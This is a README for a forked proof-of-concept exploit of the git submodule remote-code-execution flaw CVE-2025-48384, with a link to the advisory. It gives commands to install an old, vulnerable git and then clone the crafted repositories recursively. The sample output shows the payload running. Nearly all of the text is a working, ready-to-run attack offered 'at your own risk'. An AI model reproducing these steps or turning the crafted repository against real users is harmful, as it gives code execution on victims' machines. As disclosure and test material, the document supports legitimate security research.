The fork:
ℹ️ This forks liamg/CVE-2025-48384, changing submodule path from SSH link to local, by also previously pulling via HTTPS so it can be pulled without authentication. Kudos to Liam Galvin for making his PoC available in the first place!
⚠︎ Use at your own risk ⚠︎
Info Reference: https://github.com/git/git/security/advisories/GHSA-vwqx-4fm8-6qc9
Tested in alpine image using downgraded git - prep:
wget https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/git-2.40.4-r0.apk
apk add --no-cache --allow-untrusted git-2.40.4-r0.apk
To run POC:
git clone https://github.com/vinieger/CVE-2025-48384.git
git clone https://github.com/liamg/CVE-2025-48384-submodule.git
git -c protocol.file.allow=always clone --recurse-submodules ./CVE-2025-48384 poc
Example output:
# git clone https://github.com/vinieger/CVE-2025-48384.git && \
> git clone https://github.com/liamg/CVE-2025-48384-submodule.git && \
> git -c protocol.file.allow=always clone --recurse-submodules ./CVE-2025-48384 test
Cloning into 'CVE-2025-48384'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (19/19), done.
Receiving objects: 100% (24/24), 6.98 KiB | 6.98 MiB/s, done.
remote: Total 24 (delta 10), reused 14 (delta 4), pack-reused 0 (from 0)
Resolving deltas: 100% (10/10), done.
Cloning into 'CVE-2025-48384-submodule'...
remote: Enumerating objects: 8, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 8 (delta 0), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (8/8), done.
Cloning into 'test'...
done.
'ubmodule 'sub' (/tmp/./CVE-2025-48384-submodule) registered for path 'sub
'...ing into '/tmp/test/sub
done.
Uh-oh, this is an RCE!
': checked out '8bc094fc71a2db8a4ac5806f72f1ec49c0cefec0'
The executed payload is the original file hosted here.